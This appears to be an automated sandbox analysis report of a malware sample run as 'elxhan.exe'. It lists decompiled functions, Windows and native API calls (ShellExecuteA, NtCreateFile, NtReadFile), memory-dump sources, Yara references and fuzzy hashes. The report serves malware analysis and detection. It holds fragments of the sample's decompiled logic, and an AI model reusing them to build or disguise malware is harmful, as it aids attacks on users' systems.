                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction ID: a813fbf5fdd61ad2e6297c1d03dc0b5dcb1e266bf9714427259c3b0395662638
                                                                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction Fuzzy Hash: 9D018D7A940308B9EB11EF90CD46FEA77ACDB04700F104177B904F65D0E6785A54D79C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040C2D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction ID: c6bc4c080fc5fa975f8bb2417a4f68ba34bc7cc60baef9af76509d3dfd8a5f6d
                                                                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction Fuzzy Hash: 1F01527A950308BAEB11EB90CD46BEA77ACDB04700F604176BA04F65C0E6B86A54D79D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040B220, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 730355536-0
                                                                                                                          • Opcode ID: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                                                                          • Instruction ID: d2b02c823ba1647cc84e75737c235603f8a51179c48dc4d6faecaae88e00545b
                                                                                                                          • Opcode Fuzzy Hash: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                                                                          • Instruction Fuzzy Hash: B40184B02043406ED715AF699D0AB1A7BB5F745704F04847FA140BA2E1CBBE54B0CB5F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406520, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406520(void* __eax, struct HICON__* __edx) {
				void _v32;
				void* _v40;
				void* _v48;
				void* _v52;
				void* _t17;
				void* _t20;
				struct _ICONINFO* _t23;

				_t9 = __eax;
				_t20 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x1c))) {
					E004064E4(__eax);
					_t9 = __edx;
					 *((intOrPtr*)(_t20 + 0x1c)) = __edx;
					if(__edx != 0) {
						GetIconInfo(__edx, _t23);
						GetObjectA(_v40, 0x18,  &_v32);
						 *(_t20 + 0x18) = _v40;
						_t17 = _v52;
						if(_t17 != 0) {
							DeleteObject(_t17);
						}
						_t9 = _v48;
						if(_t9 != 0) {
							return DeleteObject(_t9);
						}
					}
				}
				return _t9;
			}










                                                                                                                          0x00406520
                                                                                                                          0x00406527
                                                                                                                          0x0040652c
                                                                                                                          0x00406530
                                                                                                                          0x00406535
                                                                                                                          0x00406537
                                                                                                                          0x0040653c
                                                                                                                          0x00406540
                                                                                                                          0x00406551
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406563
                                                                                                                          0x00406566
                                                                                                                          0x00406566
                                                                                                                          0x0040656b
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406574
                                                                                                                          0x00406571
                                                                                                                          0x0040653c
                                                                                                                          0x0040657e

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                                                                          • GetIconInfo.USER32(?), ref: 00406540
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406566
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406574
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3133107492-0
                                                                                                                          • Opcode ID: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                                                                          • Instruction ID: 2ae9454a62f4479f67ab2556911db7116a2ee9a23fb28f719fd143bfb6d196f5
                                                                                                                          • Opcode Fuzzy Hash: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                                                                          • Instruction Fuzzy Hash: B9F06DB1A003117BCB00EE7AAC8594B72DC9F44750B02083EB940FB386E638DD6487E9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040FFB8, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040FF7C: DestroyCursor.USER32(00000000), ref: 0040FF8B
                                                                                                                          • GetIconInfo.USER32(?), ref: 0040FFD8
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0040FFE9
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040FFFE
                                                                                                                          • DeleteObject.GDI32(?), ref: 0041000C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3133107492-0
                                                                                                                          • Opcode ID: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                                                                          • Instruction ID: 2d28933f0b2e023a71d2f14a39f9032314a54afd7f494d7512fc5867bd48f6a1
                                                                                                                          • Opcode Fuzzy Hash: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                                                                          • Instruction Fuzzy Hash: 67F06271A043155BCB14EEB99CC1A8B769C9F48754B00482AB850E7342E7B8DC8487E5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004105E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteIconInfoObject
                                                                                                                          • String ID: ,k@
                                                                                                                          • API String ID: 2689914137-1053005162
                                                                                                                          • Opcode ID: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                                                                          • Instruction ID: 6eb33a66848ac9ac3950d349fa1ce54abc8aaa9849f71adcceb630d577d3c1da
                                                                                                                          • Opcode Fuzzy Hash: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                                                                          • Instruction Fuzzy Hash: B7414C71E0021A9FDF10DF99C881AAEBBB4FF48318F11406AD911B7381D778AD95CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004078A6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E004078A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char* _t39;
				void* _t40;
				void* _t46;
				intOrPtr _t57;
				void* _t61;

				_t60 = __esi;
				_t59 = __edi;
				_t46 = __ecx;
				_t45 = __ebx;
				E004049D0(0, __ebx, _t61 - 0xa244, __edi, __esi);
				E00404EEC(_t61 - 0xa240);
				SetCurrentDirectoryA(E0040340C( *((intOrPtr*)(_t61 - 0xa240))));
				_push(1);
				_push(0);
				E00406F34(1, __ebx, _t61 - 0xa248, __edi, __esi);
				_push(E0040340C( *((intOrPtr*)(_t61 - 0xa248))));
				E00405008(_t61 - 0xa250, _t45, _t46);
				E004031F4(_t61 - 0xa254, 9, 0x4091b4);
				E004049D0(0, _t45, _t61 - 0xa25c, _t59, _t60);
				E00404ED0( *((intOrPtr*)(_t61 - 0xa25c)), _t61 - 0xa258);
				E004032CC();
				_t39 = E0040340C( *((intOrPtr*)(_t61 - 0xa24c)));
				_t40 =  *0x40a650; // 0x400000
				ShellExecuteA(_t40, "open", _t39,  *(_t61 - 0xa258),  *(_t61 - 0xa254),  *(_t61 - 0xa250));
				_pop(_t57);
				 *[fs:eax] = _t57;
				_push(E00407993);
				return E004030B8(_t61 - 0xa25c, 0x14);
			}








                                                                                                                          0x004078a6
                                                                                                                          0x004078a6
                                                                                                                          0x004078a6
                                                                                                                          0x004078a6
                                                                                                                          0x004078ae
                                                                                                                          0x004078bf
                                                                                                                          0x004078d0
                                                                                                                          0x004078d5
                                                                                                                          0x004078d7
                                                                                                                          0x004078e1
                                                                                                                          0x004078f1
                                                                                                                          0x004078f8
                                                                                                                          0x00407913
                                                                                                                          0x00407926
                                                                                                                          0x00407937
                                                                                                                          0x0040794d
                                                                                                                          0x00407958
                                                                                                                          0x00407963
                                                                                                                          0x00407969
                                                                                                                          0x00407970
                                                                                                                          0x00407973
                                                                                                                          0x00407976
                                                                                                                          0x0040798b

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004049D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000), ref: 00404A09
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 004078D0
                                                                                                                            • Part of subcall function 00405008: GetTempPathA.KERNEL32(00000105,?,00000000,00405072,?,00000000), ref: 00405036
                                                                                                                            • Part of subcall function 004049D0: GetCommandLineA.KERNEL32(00000000,00404ADA,?,?,?,?,?,004070F9,00000000,00407126,?,00000000,?,00408179,00000000,00408220), ref: 00404A23
                                                                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00407969
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                                                                          • String ID: open
                                                                                                                          • API String ID: 2622400689-2758837156
                                                                                                                          • Opcode ID: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                                                                          • Instruction ID: bc53e8da7d6e16968f2b3cdc64b9b09c5d4ffb8ac025ca0eed744acd73de400d
                                                                                                                          • Opcode Fuzzy Hash: fab5c3a15cb1cae7a61865492dfe33df0841a2aab3c5e5074238c8010eb0912a
                                                                                                                          • Instruction Fuzzy Hash: 83113070B107198ADB10FB79CC41A8DB779FF85308F0085F6B108BB192D67E9E858E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041133E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,Function_00004ADA), ref: 0040E4A1
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00411368
                                                                                                                            • Part of subcall function 0040EAA0: GetTempPathA.KERNEL32(00000105,?,00000000,Function_00005072), ref: 0040EACE
                                                                                                                            • Part of subcall function 0040E468: GetCommandLineA.KERNEL32(00000000,Function_00004ADA), ref: 0040E4BB
                                                                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                                                                          • String ID: open
                                                                                                                          • API String ID: 2622400689-2758837156
                                                                                                                          • Opcode ID: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                                                                          • Instruction ID: ca9bbc1aa8f47e6c3f9ee794e5cc2909a51f6400e8153674fcf191bbd04044bb
                                                                                                                          • Opcode Fuzzy Hash: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                                                                          • Instruction Fuzzy Hash: D211ED70F043198EEB10FB79CC81A89B375EF86308F4049B6A008B7191D67E6E858E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Analysis Process: elxhan.exe PID: 5572 Parent PID: 1144 elxhan.exeCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 00419FCB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 21%
                                                                                                                          			E00419FCB(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				asm("cvtps2pd xmm2, [ecx+0x55]");
				_t13 = _a4;
				_t30 = _a4 + 0xc48;
				E0041AB20(_t28, _t13, _t30,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t29, _t32); // executed
				return _t18;
			}








                                                                                                                          0x00419fcd
                                                                                                                          0x00419fd3
                                                                                                                          0x00419fdf
                                                                                                                          0x00419fe7
                                                                                                                          0x00419ff2
                                                                                                                          0x0041a00d
                                                                                                                          0x0041a015
                                                                                                                          0x0041a019

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: 2MA$2MA
                                                                                                                          • API String ID: 2738559852-947276439
                                                                                                                          • Opcode ID: 73bcaf09a2a61078f1d781c27756ca93da96efef112bc5d4b270d463a52e6b7a
                                                                                                                          • Instruction ID: 104f8a14ad246c84b076e6c0995b0dbe01c20c6baf94378359c58f09699a7de8
                                                                                                                          • Opcode Fuzzy Hash: 73bcaf09a2a61078f1d781c27756ca93da96efef112bc5d4b270d463a52e6b7a
                                                                                                                          • Instruction Fuzzy Hash: 98F0EC71204104ABDB04DF99DC51EDB77A9EF8C754F118249BE1D97241D631E811CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00419FD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00419FD0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                          0x00419fd3
                                                                                                                          0x00419fdf
                                                                                                                          0x00419fe7
                                                                                                                          0x00419ff2
                                                                                                                          0x0041a00d
                                                                                                                          0x0041a015
                                                                                                                          0x0041a019

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: 2MA$2MA
                                                                                                                          • API String ID: 2738559852-947276439
                                                                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction ID: 629a420ec24cda59f7740677f87fbeb895876e778ce4a2e4436109007655ca88
                                                                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction Fuzzy Hash: 4BF0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630F851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00419F74, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00419F74(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;

				asm("cld");
				asm("sbb eax, 0x8b55eba0");
				_t17 = _a4;
				_t3 = _t17 + 0xc40; // 0xc40
				E0041AB20(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t23 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}





                                                                                                                          0x00419f76
                                                                                                                          0x00419f1d
                                                                                                                          0x00419f23
                                                                                                                          0x00419f2f
                                                                                                                          0x00419f37
                                                                                                                          0x00419f59
                                                                                                                          0x00419f6d
                                                                                                                          0x00419f71

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          • Opcode ID: 1f282038835892fe2a911355963dae7f061a2992e7c6dfaffda584ea3c3d0ae9
                                                                                                                          • Instruction ID: 958d07229d913f87e4baa3ae89b3a7fbe58ef3a034b199866343c7c2239820d4
                                                                                                                          • Opcode Fuzzy Hash: 1f282038835892fe2a911355963dae7f061a2992e7c6dfaffda584ea3c3d0ae9
                                                                                                                          • Instruction Fuzzy Hash: 0901F2B2204108AFCB08CF88DC95EEB37EAAF8C354F118209FA1DD3240C630E851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00419F1A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00419F1A(void* __edx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, char _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t21;
				void* _t33;

				_push(es);
				asm("sbb eax, 0x8b55eba0");
				_t15 = _v0;
				_t3 = _t15 + 0xc40; // 0xc40
				E0041AB20(_t33, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t11 =  &_a16; // 0x414b77
				_t21 = NtCreateFile(_a4, _a8, _a12,  *_t11, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t21;
			}






                                                                                                                          0x00419f1c
                                                                                                                          0x00419f1d
                                                                                                                          0x00419f23
                                                                                                                          0x00419f2f
                                                                                                                          0x00419f37
                                                                                                                          0x00419f59
                                                                                                                          0x00419f6d
                                                                                                                          0x00419f71

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          • Opcode ID: 00413d03e9703152796fabcd5b5efe14935391633a0e48a8fd2306b87820dcc4
                                                                                                                          • Instruction ID: 59240f0c24d42f4f4d5e5ce5e836e36d48a0276155dc8ed090b9bdda842d8758
                                                                                                                          • Opcode Fuzzy Hash: 00413d03e9703152796fabcd5b5efe14935391633a0e48a8fd2306b87820dcc4
                                                                                                                          • Instruction Fuzzy Hash: 1801BDB2205108AFDB08CF98DC95EEB37AAAF8C754F158649FA1DD7241C630EC51CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00419F20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00419F20(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB20(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                          0x00419f2f
                                                                                                                          0x00419f37
                                                                                                                          0x00419f59
                                                                                                                          0x00419f6d
                                                                                                                          0x00419f71

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: wKA
                                                                                                                          • API String ID: 823142352-3165208591
                                                                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                          • Instruction ID: 918681b749d1ebc684007e4c1563b975095bc633172356dce6c62aeb4b4fe286
                                                                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                          • Instruction Fuzzy Hash: 2DF0B2B2205208ABCB08CF89DC95EEB77ADAF8C754F158249BA0D97241C630F851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041A04A, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E0041A04A(signed char* __ecx) {

				asm("movsb");
				if (( *__ecx & 0x000000a8) <= 0) goto L3;
			}



                                                                                                                          0x0041a04b
                                                                                                                          0x0041a04f

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
